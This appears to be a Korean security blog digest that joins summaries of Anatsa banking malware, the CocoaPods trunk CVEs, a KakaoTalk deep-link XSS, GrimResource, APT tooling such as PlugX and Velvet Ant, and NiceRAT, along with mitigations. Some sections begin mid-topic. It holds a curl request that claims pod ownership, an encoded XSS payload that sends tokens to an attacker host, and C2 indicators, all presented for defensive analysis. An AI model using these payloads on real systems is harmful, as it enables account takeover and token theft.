- 정상 앱을 가장해 구글 플레이를 통해 유포되는 금융 정보 탈취 악성앱 Anatsa - 최근 국내 금융 분야를 대상으로 공격 범위를 확대하고 있어 주의 요구
내용
- Anatsa > 21년 초 유럽 금융 앱을 대상으로 금융정보 탈취 공격을 시작한 안드로이드 기반 악성 앱 > 정상 서비스로 위장해(PDF 리더, QR코드 스캐너 등) 구글 플레이 스토어를 통해 유포 > 스마트폰에 설치되면, 앱 업데이트를 가장해 Anatsa 악성 앱이 다운로드 및 설치
> C2 서버의 명령에 따라 데이터 탈취(스크린샷, 문자, 인증코드 등) 및 스마트폰 제어(화면잠금 해제, 화면 터치, 값 입력 등) > 탈취한 데이터는 C2 서버로 전송
- 최근 국내 금융을 대상으로 공격 범위 확대 > 24.06 기준 한국 포함 54개 국가의 금융·핀테크·가상화폐 등 688개 앱이 금융정보 탈취 대상에 포함된 것을 확인
- Anatsa 악성 앱은 접근성 권한을 악용 > Anatsa 악성 앱 실행 시 사용자에게 접근성 권한 활성화 안내 화면 표시 > 접근 권한이 활성화되면, 실행되는 앱 또는 동작을 탐지하고, 입출력 값을 확인하거나 버튼을 클리하는 등의 기능 악용 > 특히 키로깅, 오버레이 공격을 활용해 금융정보를 탈취 > 또한, 모바일 백신·클리너 실행을 방지하고, 종료나 설정 메뉴 접근을 차단해 악성 앱이 종료 또는 삭제되는 것을 막음
- 유의사항 > 앱 설치 전 사용자 리뷰, 약관, 포럼 등을 확인 > 앱 실행에 필요하지 않는 권한 비활성화 > 출처를 알 수 없는 앱 설치 비활성화 > 최신 버전의 OS 사용 및 보안 업데이트 수행 > 최신 버전의 모바일 백신 사용 및 주기적인 검사 수행 ※ 스마트폰에 악성 앱이 설치된 경우 스마트폰을 안전모드로 부팅한 후 악성 앱을 제거할 수 있음
- Apple에서 나온 거의 모든 장비에 영향을 주는 10년간 방치되어 있다 발견 [1] - 취약점은 종속성 관리자 CocoaPods 프로그램에서 발생 [2] - 악용한 시도는 아직까지 확인되지 않았으며, 취약점은 패치됨
1.1 관련 용어
구분
설명
Pod
프로젝트의 Dependency 상황을 서술하고 있는 파일
Dependency(의존성)
소프트웨어를 구성하는 요소들끼리 상호 의존하는 관계
CocoaPods
Swift와 Objective-C 언어로 만들어진 애플리케이션들의 디펜던시 관리를 편리하게 해 주는 오픈소스로, 팟들을 관리
Swift
개발 언어 중 하나
Objective-C
Trunk
코코아팟즈와 연결된 서버로, 팟들을 저장하고 관리
2. 주요내용
2.1 CocoaPods 마이그레이션
- 2014년 CocoaPods은 새롭게 구축한 Trunk 서버로 마이그레이션 - 마이그레이션으로 인해 모든 Pod의 소유자가 초기화 - Pod의 원 소유자들은 CocoaPods에 연락해 Pod에 대한 소유권을 주장 - 그러나 일부 Pod 소유자들은 소유권을 주장하지 않았고, 1,870개의 Pod가 주인 없이 방치
2.2 CVE-2024-38368 [3]
[사진 1] CVE-2024-38368
- 임의의 사용자가 방치된 Pod의 소유권을 획득할 수 있는 취약점 (CVSS: 9.3)
> 누구나 Pod에 접근 및 내용을 수정이 가능하여 악성코드 삽입 가능 > 방치된 Pod는 기본 CocoaPods 계정(unclaimed-pods[@]cocoapods.org)과 연결되어 있었음 > 또한, Pod의 소유권을 주장할 수 있는 공개 API 엔드포인트가 사용가능해 누구나 검증 없이 Pod의 소유권을 획득할 수 있었음
- 공격자는 해당 API에 대상 Pod를 포함한 간단한 CURL 요청을 통해 소유권 획득 가능
# Curl request for changing ownership of a targeted orphaned pod curl -X 'POST' \ -H 'Host: trunk.cocoapods.org' \ -H 'Content-Type: application/x-www-form-urlencoded' \ --data-binary 'owner[name]=EVA&email=research@evasec.io' --data-binary 'pods[]=[TARGET_UNCLAIMED_POD]&button=SEND' 'hxxps://trunk.cocoapods.org/claims'
2.3 CVE-2024-38366 [4]
[사진 2] CVE-2024-38366
- 이메일 도메인의 MX 레코드 유효성을 확인하는 rfc-822 라이브러리에의해 발생하는 원격 코드 실행 취약점 (CVSS: 10.0)
> rfc-822 라이브러리는 MX 레코드 유효성 검증을 위해 셸 명령을 실행하여 이로 인해 원격 코드 실행이 가능해짐 > 익스플로잇에 성공시 모든 Pod 소유자들의 세션 토큰 덤프하고 클라이언트 트래픽 조작 가능하며, 서버 자체를 완전히 셧다운 시키는 것도 가능
[사진 3] 취약한 rfc-822 구현
① mx_records() > 38행: 이메일 주소를 받아 모듈의 EMAIL 정규식 패턴과 비교하여 검증 > 41행: 제공된 이메일 주소에서 분할된 도메인 부분을 이용해 raw_mx_records() 호출 ② raw_mx_records() > 49~51행: 도메인 부분 수신 및 DNS MX 레코드 검증을 위해 host_mx() 호출 ③ host_mx() > 53~55행: 임의의 OS 명령 '/usr/bin/env host -t MX #{domain}'을 실행하고, 이를 사용자가 제공한 이메일의 도메인과 연결 > 적절한 검증 없이 제공된 이메일 주소에 대해 OS 명령을 실행하여 취약점 발생
[영상 1] 취약점 시연 영상 [5]
2.4 CVE-2024-38367 [6]
[사진 4] CVE-2024-38367
- 사용자들의 상호작용 없이 세션 인증 토큰을 탈취할 수 있는 제로클릭 취약점 (CVSS: 8.2)
> 취약점은 세션 유효성 검사 URL을 구성하는 sessions_controller 클래스의 'Trunk' 서버 소스 코드에 위치
[사진 5] sessions_controller.rb
① request.host_wth_port() > 21행: 세션 검증 URL의 도메인 부분을 생성하며, 새 세션이 생성 및 생성된 링크가 이메일을 통해 전송 > request.host_wth_port()는 Host 헤더나 다른 환경 변수 값보다 X-Forwarded-Host 헤더를 우선시
- 공격자는 조작된 X-Forwarded-Host를 통해 스푸핑된 도메인이 포함된 세션 검증 URL을 생성 및 공격자 메일로 전송 > 공격자는 검증 URL을 통해 세션 토큰을 탈취할 수 있음
- 일부 APT 조직들이 랜섬웨어를 위장 도구로 활용하는 사례 발견 > 랜섬웨어 공격자들이 한 것처럼 일을 꾸며 추적을 늦춤
- 국내외 랜섬웨어 감염 속출 > KISA, 랜섬웨어 예방을 위한 권고, 보안 강화 방안 공유
내용
- 랜섬웨어를 전면에 내세우고 다른 목적을 달성하기 위한 공격이 주로 발생 > Ex, 카멜갱(ChamelGang)_중국 APT 조직 / 안다리엘(Andariel)_북한 APT 조직
- APT 단체들이 자신들의 목적을 달성하기 위해 랜섬웨어를 전면에 내세우고 있음 > 정보 탈취와 에스피오나지 목적 > 랜섬웨어로 자신들의 행위를 위장하여 수사에 혼선 유발 > 훔쳐낼 정보가 더 이상 없거나 반드시 파괴해야할 필요가 있을 시 랜섬웨어로 실제 피해를 유발
- 카멜갱(ChamelGang) > 이미 널리 공개된 다양한 공격 도구 또는 자체 개발 공격 도구 사용 > 비컨로더(BeaconLoader), 코발트스트라이크(Cobalt Strike), 오크도어(AukDoor), 도어미(DoorMe), 제티코베스트크립트(Jetico BestCrypt), 마이크로소프트비트락커(Microsoft BitLocker) 등 ※ 도어미: 카멜갱이 독자적으로 만들거나 수정한 공격 도구
- 카멜갱의 커스텀 멀웨어를 다른 중국 APT 조직이 몇 번 사용함 > 중국 사이버 공격자들 사이 연관성(도구, 전술, 노하우 등)이 계속해서 자주 발견되는 중 ==================================================================================== - 전 세계 곳곳에서 랜섬웨어 감염 사고 발생 > 24.06 말 잡플랫 랜섬웨어 공격을 당한 후 현재까지 복구되지 않음 > 잡플랫은 여러 서버를 분리해 운영했으나, 백업 서버까지 랜섬웨어 공격을 당했다고 설명
> 인도네시아에서 중앙·지방 정부와 공공기관이 이용하는 국가 데이터센터 랜섬웨어 공격 > 인도네시아 210개 공공기관 서비스 7천여개 중단 및 지연 > 24.06.27 기준 98%가 백업되지 않은 상황으로, 8월 중순 복구 예상
- KISA 랜섬웨어 감염 예방을 위한 권고와 보안 강화 방안 발표 ① 외부 접속 관리 강화: 불필요한 네트워크 서비스 차단 > 외부에 노출된 DB 서비스, NAS(Network Access Server) 등 서비스 현황 파악 및 불필요한 시스템 연결 차단 > 테스트 서버나 유휴 서버 등 방치된 시스템 점검 필요 > 중요 시스템 접속자는 개인 단말에 임의로 원격 제어 프로그램을 설치해 사용하는지 점검
② 계정 관리 강화 : 비밀번호 관리 > ‘admin’ 등 기본 관리자 비밀번호 반드시 변경 > 사용하지 않는 기본 관리자 계정은 비활성화 또는 권한 제한 > 비밀번호를 설정할 시 대문자, 소문자, 특수분자, 숫자를 조합 > 정기적 비밀번호 변경
③ 백업 : 저장소 분리·인증 > 중요 자료는 네트워크와 분리된 별도 저장소에 정기적 백업 > 중요 자료의 경우 분산해 백업하고, 외부 클라우드에 중요 자료를 보관하는 것이 권장 > 소유기반의 이중 인증을 적용하는 것이 안전 ※ 많은 피해기업이 백업을 수행했음에도, 같은 저장소에 보관함에 따라 복구에 어려움을 겪는 중
④ 이메일 보안 강화 > 송신자를 정확히 확인 > 모르는 이메일과 첨부된 파일은 열람하지 말것 > 이메일 수신 시 출처가 불분명한 사이트는 주소 클릭 자제
> intent:// 방식을 지원해 다른 앱 구성요소에 데이터 전송 가능 > intent:// URI의 검증이 부족해 잠재적으로 모든 앱 컴포넌트에 접근 가능 > Authorization HTTP 헤더에서 액세스 토큰을 유출
※ Deep Link: 모바일 웹상에 있는 링크나 그림을 클릭할 경우 기기 내 관련 앱이나 사전에 정의된 특정 웹페이지가 실행되는 모바일 기술
2.3 URL 리디렉션을 통한 DOM XSS
> hxxps://buy.kakao.com에서 hxxps://buy.kakao.com/auth/0/cleanFrontRedirect?returnUrl= 엔드포인트를 통해 XSS 취약점 발견 > hxxps://m.shoppinghow.kakao.com/m/search/q/alert(1)에서 이미 저장된 XSS를 확인 > 따라서 CommerceBuyActivity에서 임의의 JavaScript를 실행해 사용자의 액세스 토큰을 유출할 수 있음
- 악성 Deep Link를 생성해 사용자의 액세스 토큰을 공격자가 제어하는 서버로 전송 가능
> 이를 통해 카카오 메일 계정을 탈취하거나 새로운 카카오 메일 계정을 생성해 기존 이메일 주소를 덮어쓸 수 있음 > 또는, 피해자의 카카오 메일 계정에 접근해 비밀번호 재설정을 시도할 수 있음(2FA 우회를 위해 Burp를 사용해 요청을 가로채고 수정)
2.4 PoC
① 공격자는 악성 Deep Link를 생성
[악성 Deep Link 예시] location.href = decodeURIComponent("kakaotalk%3A%2F%2Fbuy%2Fauth%2F0%2FcleanFrontRedirect%3FreturnUrl%3Dhttps%3A%2F%2Fm.shoppinghow.kakao.com%2Fm%2Fproduct%2FQ24620753380%2Fq%3A%22%3E%3Cimg%20src%3Dx%20onerror%3D%22document.location%3Datob%28%27aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv%27%29%3B%22%3E");
- 여전히 복잡하지 않은 공격 체인으로 사용자의 메시지를 탈취할 수 있는 인기 채팅 앱이 존재 - 앱 개발자가 몇 가지 간단한 실수를 하면 Android의 강력한 보안 모델과 메시지 암호화가 도움이 되지 않음 - 아시아 채팅 앱은 보안 연구 커뮤니티에서 여전히 저평가되고 있음
2.6 기타
- 개발자 보안 교육 필요성: 안전한 어플리케이션 개발을 위한 보안 교육 진행(시큐어 코딩, 민감 데이터 관련 기능 개발 주의 등) - 사용자 보안 교육 필요성: 출처가 불분명한 의심스러운 링크를 클릭하지 않고, 2FA를 사용하는 등의 보안 교육 진행 - 다른 메신저 사용 고려
- MMC를 활용해 보안 장치를 우회하는 새로운 공격 수법 GrimResource 등장 [1]
> MMC를 통해 MSC 파일을 열 수 있음 > 해당 MSC 파일 내 StringTable이라는 요소에 저장되어 있는 APDS 자원을 익스플로잇 > 보안 장치들을 우회하여 원하는 코드 실행 가능
1.1 Microsoft Management Console, MMC
- 마이크로소프트 관리 콘솔 - Windows 운영 체제에서 시스템 구성 요소를 관리하고 설정하는 데 사용되는 도구 - 여러 관리 항목들(스냅인, 특정 시스템 구성 요소를 관리하는 작은 모듈)을 한곳에 모아 관리할 수 있도록 하는 프로그램 - Windows 환경에서 GUI와 콘솔의 생성, 저장, 열기 등을 수행할 프로그램 작업을 제공하는 일종의 응용 프로그램
1.2 Management Saved Console, MSC
- MMC에서 만든 사용자 정의 콘솔을 저장한 파일
2. 주요내용
- GrimResource 공격은 apds.dll 라이브러리에 있는 오래된 XXS 결함을 사용
> MSC 파일의 StringTable섹션에 취약한 APDS 리소스에 대한 참조를 추가하여 임의의 자바스크립트를 실행할 수 있음
> 해당 취약점은 이미 2018년 MS와 Adobe로 제보가 되었으나 아직 패치되지 않음
[사진 1] StringTable 섹션 APDS 리소스
- ActiveX 보안 경고를 피하기위해 TransformNode 난독화 기술을 사용
> TransformNode 난독화: 소스 코드를 분석해 코드의 구조와 기능을 파악한 후 그 결과를 바탕으로 변환 규칙을 생성 및 적용하여 난독화 > 난독화된 내장 VBScript가 생성
[사진 2] TransformNode 난독화
- VBScript는 일련의 환경 변수에서 대상 페이로드를 설정한 뒤 DotNetToJs 기술을 활용하여 .NET 로더 실행
> DotNetToJs: Microsoft .NET 코드를 JavaScript 코드로 변환하는 프로세스
[사진 3] VBScript
- 로더는 VBScript가 설정한 환경 변수에서 페이로드 검색 및 dllhost.exe의 새 인스턴스 생성하여 페이로드 주입 > 페이로드 주입에 DirtyCLR 기술, 함수 연결 해제 및 간접 syscall을 사용
[사진 4] 환경변수 설정[사진 5] 페이로드 검색 로더
- 확인 권고사항 > mmc.exe에 의해 호출된 apds.dll과 관련된 파일 작업 > MCC를 통한 의심스러운 실행, 특히 .msc 파일 인수를 사용하여 mmc.exe에 의해 생성된 프로세스 > 스크립트 엔진 또는 .NET 구성 요소에서 발생하는 mmc.exe에 의한 RWX 메모리 할당 > JScript 또는 VBScript와 같은 비표준 스크립트 인터프리터 내에서 비정상적인 .NET COM 개체 생성 > APDS XSS 리디렉션의 결과로 INetCache 폴더에 생성된 임시 HTML 파일
- AI를 활용한 사이버 위협: 신분위장, 피싱 콘텐츠 제작, 악성코드 제작 - 플랫폼 공격: 기반시설 공격, 클라우드 인프라 공격, SW공급망 공격
내용
- 가트너 ‘2024년 주요 전략기술 동향(Top Strategic Technology Trends 2024)’ > AI를 노리는 공격이 점차 활발해지고 있으며, 파급력을 높이기 위해 플랫폼을 타깃으로 공격하는 추세
- 금융보안원 ‘2024 사이버보안 콘퍼런스’ > AI를 타깃으로 한 사이버위협 사례 ① AI 모델 공유 플랫폼 공격: AI 모델을 제공하는 공유 플랫폼을 악용해 악성코드를 유포 ② AI 취약점 공격: AI 시스템의 취약점을 악용해 악성코드를 실행하는 공격 ③ 데이터 오염: AI 모델이 참조하는 데이터를 오염시켜 악성행위를 유발
> AI를 악용한 사이버위협 사례 ① 신분위장: 딥페이크 기술을 이용해 신분을 위장하거나 악성앱을 통해 개인정보를 수집해 신분을 위장 ② 피싱 콘텐츠 제작: 생성형 AI를 이용해 스피어피싱 이메일 문구를 생성하고, 이용자를 피싱 사이트로 유도 및 피싱 사이트 역시 AI를 이용 ③ 악성코드 제작: 생성형 AI를 이용한 악성코드 개발은 챗GPT를 이용해 랜섬웨어를 제작
> 주요 사이버위협 사례: 플랫폼 공격 ① 기반시설 공격: 경제활동의 기반이 되는 주요 시설을 공격하는 것 ② 클라우드 인프라 공격: 컴퓨팅 자원(서버, 저장소, 네트워크 등)을 제공하는 시스템을 공격하고, 불법 취득한 인증정보로 클라우드 접속 및 저장소 데이터에 접근해 클라우드 데이터를 유출, 특히 악성코드 유포지 및 C&C 서버로 일반 클라우드를 활용 ③ SW공급망을 공격: 소프트웨어 업데이트 배포 과정을 이용해 악성코드를 배포하는 공격 ④ 서비스형 악성코드 활용: Maas(Malware as a Service), RaaS(Ransomware as a Service) 등 해커가 판매하는 악성코드를 구매해 공격에 활용
- 전 세계 주요 공격 트렌드: 제로데이 활용, MFA 우회 위한 AiTM 활용, 피싱 공격 진화 - 취약점 공격, 피싱, 사전보안 침해 등으로 공격 및 백도어, 랜섬웨어, 웹셸 등의 악성코드 사용
내용
- 주요 공격 트렌드 ① 제로데이 활용 > 엣지 기기와 플랫폼을 표적으로 삼는 중국 연계 공격자들이 증가 > 제로데이를 통해 침투한 후 OS 도구를 활용하여 내부에서 탐지가 어려움
② MFA 우회 위해 AiTM 활용 > 세션 토큰 도용, 웹 프록시, AiTM 피싱 페이지로 MFA 우회 > 그러나 많은 조직이 토큰 도난 방지 기능을 제공하지 않는 보안 시스템 사용 중
③ 피싱 공격 진화 > 첨부파일, SNS, 신뢰할 수 있는 관계 악용 등
- 초기 감염 백터 > 취약점 공격 38% > 피싱 17% > 사전 보안침해 15% > 도용된 사용자 인증 정보 10% > 무차별 대입 6% > 웹 보안 침해 5% > 서버 보안 침해 3% > 써드파티 보안 침해 2% > 기타 2% > 소셜 미디어 피싱 1% > SIM 스와핑 1%
- 가장 많이 사용된 악성코드 > 백도어(BEACON), 랜섬웨어(ALPHV), 웹셸(LEMERLOOT), 터널러(SYSTEMBC), 록빗(LOCKBIT) 랜섬웨어 등 > PowerShell 32.3%, Web Protocols 29.6%, Remote Desktop Protocol 28.3%, Service Execution 26.8%, File Deletion 26.6%
- 금융(17.3%), 비즈니스/전문 서비스(13.3%), 하이테크(12.4%) 등 > 데이터 탈취(37%)와 금전적 이익(36%) 목적
- 동아시아와 한국을 대상으로 악성코드가 유포되는 정황이 확인 - SW 취약점 또는 악성코드가 포함된 크랙 버전을 통해 유포 - C2 서버와 통신하며 추가 명령을 수행하거나 사용자 정보를 탈취
2. 주요내용
2.1 Velvet Ant [1]
- 중국 해킹 그룹 China-Nexus와 연류된 공격자가 약 3년 동안 동아시아에 위치한 익명의 조직을 대상으로 장기간 공격
- 공격자는 EDR이 설치되지 않고 로깅이 제한된 시스템을 표적으로 삼는 등 레거시 운영 체제를 노림
> 또한, 피해자 환경에 이미 배포된 원격 접속 트로이목마 PlugX를 활용
> PlugX는 2008년부터 중국 국가 후원 공격 그룹에서 사용되었으며, 감염된 시스템에 대한 원격 액세스를 제공하도록 설계
> 공격에는 인터넷에 직접 액세스할 수 있는 엔드포인트에 설치되어 민감 정보를 유출하는 버전과 C2 구성 없이 레거시 서버에만 배포되는 두 가지 버전이 사용
PlugX 실행 체인
설명
iviewers.exe
Windows SDK의 일부인 'OLE/COM 개체 뷰어'라는 합법적인 응용 프로그램
iviewers.dll
DLL 검색 순서 하이재킹을 통해 'iviewers.exe'에 의해 로드되는 악성 PlugX DLL 로더
iviewers.dll.ui
'iviewers.dll'이 실제 악성 페이로드가 포함되어 있으며, 이 페이로드는 'iviewers.dll'에 의해 로드
- C2 구성 없이 레거시 서버에 배포된 PlugX의 경우 F5 BIG-IP 장치를 이용해 역방향 SSH 터널 생성
> SSH 터널을 이용해 C2 서버와 통신하여 원격 명령을 수신하고 지속성을 확보
> 공격에 활용된 F5 BIG-IP 제품들은 지원이 종료된 제품
F5 어플라이언스 추가 악성코드
설명
VELVETSTING
- 한 시간에 한 번씩 C&C에 연결하여 실행할 명령을 검색하는 도구 - IP 주소 202.61.136[.]158:8443을 C&C로 사용 - 명령은 '1qaz@WSXedc'라는 암호로 인코딩 - 명령을 받으면 'csh'(Unix C 셸)를 통해 실행
ELVETTAP
- 네트워크 패킷을 캡처하는 기능을 갖춘 도구 - 바이너리는 F5 장치의 내부 NIC 이름인 'mgmt' 인수를 사용하여 F5 장치에서 실행
SAMRID
- GitHub에서 사용할 수 있는 오픈 소스 SOCKS 프록시 터널러인 'EarthWorm'으로 식별 - 이 도구는 과거 Volt Typhoon, APT27, Gelsemium 등 다양한 중국 국가 후원 그룹에서 활용
ESRDE
- VELVETSTING'과 유사한 기능을 갖춘 도구이나, bash를 사용하는 등 사소한 차이점 존재
- 공격 과정은 다음과 같음
① 악성코드는 1시간에 한 번씩 C2 서버를 폴링
② 공격자는 C2 서버와 연결
③ 역방향 SSH 터널 생성 및 원격 명령 전달
④ PlugX에 감염된 내부 파일 서버(내부 C2 서버로 사용)와 연결
⑤ PlugX 추가 배포
[사진 1] 공격 흐름 요약
대응
설명
아웃바운드 트래픽 제한
C2 서버와 통신하지 못하도록 아웃바운드 연결 차단(IP 차단)
네트워크 측면 이동 제한
SMB(445), RPC(135), WinRM(5985. 5986), RDP(3389), SSH(22) 등 측면 이동이 가능한 기술에 대한 엄격한 제어
레거시 서버 보안 강화
- 레거시 시스템 폐기 및 교체 우선적으로 처리 - 이전 시스템을 지원하는 엔드포인트 보호 도구 설치 - 트래픽 모니터링
자격 증명 수집 완화
EDR 무력화/우회 시도 방지를 위한 변조 방지 기능 구성
공용 장치 보호
자산 관리, 패치 관리, 침입 탐지 및 예방 등
침해지표 적용
공개된 침해지표 적용 [1]
2.2 미상의 중국 국가 후원 해킹 그룹 [4]
- 미상의 중국 해킹 그룹이 2020년부터 아시아 국가의 통신 사업자를 공격
> 대상 기업의 네트워크에 백도어를 설치하고 자격 증명을 도용하려고 시도
공격에 사용된 도구
설명
Coolclient
- Fireant 그룹(Mustang Panda, Earth Preta라고도 함)과 관련된 백도어 > 키 입력 로깅, 파일 읽기 및 삭제, 명령 및 제어(C&C) 서버와의 통신 기능 등 > Google 파일(googleupdate.exe)로 가장하는 합법적인 VLC 미디어 플레이어 버전이 Coolclient 로더(파일 이름: libvlc.dll)를 사이드로드하는 데 사용 > 로더는 loader.ja라는 파일에서 암호화된 페이로드를 읽으며, 이 페이로드는 goopdate.ja라는 파일에서 두 번째 암호화된 페이로드를 읽고 이를 winver.exe 프로세스에 삽입
Quickheal
- Neeedleminer 그룹(일명 RedFoxtrot, Nomad Panda)과 오랫동안 연관되어 온 백도어 > 캠페인에 사용된 변형은 GetOfficeDatatal이라는 내보내기가 있는 RasTls.dll이라는 32비트 DLL > 컴파일된 코드의 새로운 구성 세부 사항과 VMProtect 난독화 등의 차이 > TCP 포트 443을 사용하여 Swiftandfast[.]net이라는 하드코딩된 C&C 서버와 통신
Rainyday
- Firefly 그룹(일명 Naikon)과 관련된 백도어 > 캠페인에 사용된 대부분의 변종은 fspmapi.dll이라는 로더를 사용하여 실행 > 로더는 fsstm.exe라는 합법적인 F-Secure 실행 파일을 사용하여 사이드로드 > 로드되면 프로세스를 시작한 실행 파일의 디스크 폴더를 가져와 현재 디렉터리로 설정 > 그런 다음 실행 파일의 메모리 위치를 얻고 해당 메모리 이미지를 패치 > 하이재킹이 성공하면 로더는 dataresz라는 파일을 읽고 단일 바이트 XOR 키(0x2D)로 페이로드를 해독한 후 쉘코드로 실행
2.3 NiceRAT 악성코드를 설치하는 봇넷 [6]
- Windows나 MS Office 라이선스 확인 도구, 게임용 무료 서버로 위장한 악성코드 NiceRAT를 국내 사용자를 대상으로 지속적 유포
> NiceRAT는 Python으로 작성된 오픈 소스 프로그램
> 지속성 유지를 위해 디버깅 방지 감지, 가상 머신 감지, 시작 프로그램 등록 등의 작업
> api.ipify[.]org에 접속하여 시스템의 IP 정보를 수집 및 이를 이용하여 위치 정보 수집
> 시스템 정보, 브라우저 정보, 암호화폐 정보 등을 수집하여 Discord를 C2로 활용해 유출
